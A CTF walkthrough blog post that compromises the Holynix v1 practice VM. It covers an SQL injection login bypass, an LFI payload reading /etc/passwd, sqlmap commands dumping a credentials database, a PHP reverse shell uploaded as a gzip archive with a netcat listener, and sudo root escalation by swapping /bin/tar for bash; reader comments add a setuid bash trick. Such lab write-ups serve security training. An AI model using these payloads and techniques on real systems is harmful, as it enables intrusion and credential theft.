Hack the Holynix: v1 (Boot 2 Root Challenge)
Hello friends! Today we are going to take another CTF challenge known as Holynix 1 and it is another boot2root challenge provided for practice and its security level is for the beginners. So let’s try to break through it. But before please note that you can download it from here https://www.vulnhub.com/entry/holynix-v1,20/
Penetrating Methodologies
- Network Scanning (Nmap, netdiscover)
- Surfing HTTP service port (80)
- Exploit LFI/RFI Vulnerability
- SQLMAP Scanning
- Extract databases and user credentials
- Login into the website with a specific user
- Upload and execute a Reverse shell
- Reverse connection (Netcat)
- Exploiting target with SUDO binaries
- Get the Root access
WalkThrough
Let’s start off with scanning the network to find our target.
We found our target –> 192.168.1.105
Our next step is to scan our target with NMAP.
nmap -p- -A 192.168.1.105
The result shows us that there is only port 80(http) opened
When we tried to login to the URL with some random username and password (Eg: admin/admin) it gave us an error. Upon further enumeration, we found out that this is subjected to SQL injection error.
This appears to be a basic SQL query. We should now be able to execute the command to bypass the login using the or 1=1 technique
Username = ' or 1=1 # Password = ' or 1=1 #
Once logged in, we noticed that actually, we are inside the user Alamo’s login page. After having a look at different pages, we navigated to the Upload page and tried to upload the php-reverse-shell.php file
Upon trying to upload the file php-reverse-shell.php, we got the below notification. it seems the user Alamo, being a restricted user; doesn’t have permission to upload the file.
We ran Nikto to find out more details of the URL and observed that there could be an LFI/RFI vulnerability associated with the same
nikto –h http://192.168.1.105
We need to see what information is being passed upon from the user to the web server. Let’s trigger the Burpsuite and try uploading a file again, and observe what is actually happening.
First open the URL, select the Email from the dropdown and click on the Display File page
The parameter being passed in the POST request is text_file_name=ssp%2Femail.txt&B=Display+File as seen from the Burpsuite screenshot below
As we are aware that there is an LFI/RFI vulnerability on this website. Therefore let’s try to modify the parameter being passed in the POST request of Burpsuite as follows
text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File
Once we change the content of the file (as shown above) in Burpsuite, click on Forward tab and the website page will display all the contents of the /etc/passwd file
As we have got an entire list of users, let’s choose any one random user first and run SQLMAP with the following command, so as to find out other details
To begin with, we are taking the user etenenbaum as an example :
sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" --dbs --batch
We got the list of all databases!! Now we tried using creds database, with the following command to extract other users’ details
sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" -D creds --tables --dump --batch
We were able to login into the website with user etenenbaum and corresponding password (as displayed above). The next step is to set up a netcat listener on Kali machine. Upon uploading the shell script, the file got uploaded successfully; however, when we executed the file there was no output on the Netcat listener reverse shell and the browser returned an error.
Here we got a clue from the website’s upload page that there is an option “Enable the automatic extraction of gzip archives”. This made us believe to try to upload the file this time, in the zip format
Below is the command to tar and zip the reverse shell file shell.php
tar -zcvf shell.tar.gz shell.php
Click on Browse and select the file shell.tar.gz from the Kali Desktop machine. Click on the option “Enable the automatic extraction of gzip archives” and then upload the file.
We now need to locate the path of the file we just uploaded, as the actual objective is to upload a PHP reverse shell script and then execute it. We navigated to many places however were not able to find our recently uploaded file. We also checked the ‘Upload’ directory (http://192.168.1.105/upload) however got no success.
It struck us suddenly about the statement displayed on the upload page which says “Home directory uploader”. Hence it may be possible that it could be uploading files to users’ home directory.
Appended the subdirectory /~etenenbaum/ and browsed URL http://192.168.1.105/~etenenbaum/ and now we were able to see our uploaded file!!
We initiated the netcat listener on the Kali machine. Upon executing the file shell.php (as shown in the browser), we got the limited shell access
nc -lvp 1234
Now let’s perform further enumeration and try to escalate privileges.
Upon running the sudo command, we can see that there are multiple commands that will allow user www-data to sudo as root.
sudo –l
Navigate to the /tmp directory
cd /tmp/
Copy the /bin/bash file to the /tmp folder
cp /bin/bash .
Change the ownership of the file /tmp/bash, so that henceforth root is the owner
sudo chown root:root /tmp/bash
Backup the existing /bin/tar file to the bin/tar.bak
sudo mv /bin/tar /bin/tar.bak
Now move the /tmp/bash file to /bin/tar
sudo mv /tmp/bash /bin/tar
Execute the command /bin/tar (which is ideally running /bin/bash)
sudo /bin/tar
Finally, run the id command to confirm the same
id
Hurray!! We got the root access
Author: Ankur Sachdev is an Information Security consultant and researcher in the field of Network & WebApp Penetration Testing. Contact Here
cp /bin/bash /tmp/bash
chmod 4777 /tmp/bash
sudo chown root:root /tmp/bash
/tmp/bash
Much cleaner way
Can you explain in detail ‘or 1=1 #